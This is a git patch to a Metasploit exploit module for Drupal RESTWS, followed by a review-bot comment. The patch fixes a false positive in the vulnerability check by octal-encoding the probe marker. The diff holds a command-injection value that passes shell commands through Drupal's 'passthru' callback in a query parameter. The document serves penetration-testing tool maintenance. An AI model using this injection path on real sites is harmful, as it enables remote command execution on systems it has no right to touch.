From c6b309d5c9ef98e332f9419fc76712deeb461f9a Mon Sep 17 00:00:00 2001
From: William Vu
Date: Wed, 20 Jul 2016 23:28:49 -0500
Subject: [PATCH] Fix drupal_restws_exec check method false positive
---
 modules/exploits/unix/webapp/drupal_restws_exec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/unix/webapp/drupal_restws_exec.rb b/modules/exploits/unix/webapp/drupal_restws_exec.rb
index 14e1524252..4751b8e27d 100644
--- a/modules/exploits/unix/webapp/drupal_restws_exec.rb
+++ b/modules/exploits/unix/webapp/drupal_restws_exec.rb
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
 'method' => 'GET',
 'uri' => normalize_uri(target_uri.path, 'index.php'),
 'vars_get' => {
- 'q' => "taxonomy_vocabulary//passthru/echo #{r}"
+ 'q' => "taxonomy_vocabulary//passthru/printf #{Rex::Text.to_octal(r, '\\\\')}"
 }
 )
 if res && res.body.include?(r)
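Review bot: The new `'q'` line carries no comment explaining why the marker is sent octal-encoded, and the reason is not obvious from the code. With the old `echo #{r}` the literal marker travelled in the request, so any page that merely reflects the query (an error page, for instance) would satisfy `res.body.include?(r)` and report a host as vulnerable when nothing had run. A one-line comment above the line, such as `# Octal-encode the marker so a reflected request cannot match; only real printf output contains r`, would stop a later cleanup from reverting to the literal form. The doubled escaping in `'\\\\'` deserves a few words too, since it presumably has to survive one round of unescaping before printf sees it. The enclosing method begins and ends outside the hunk.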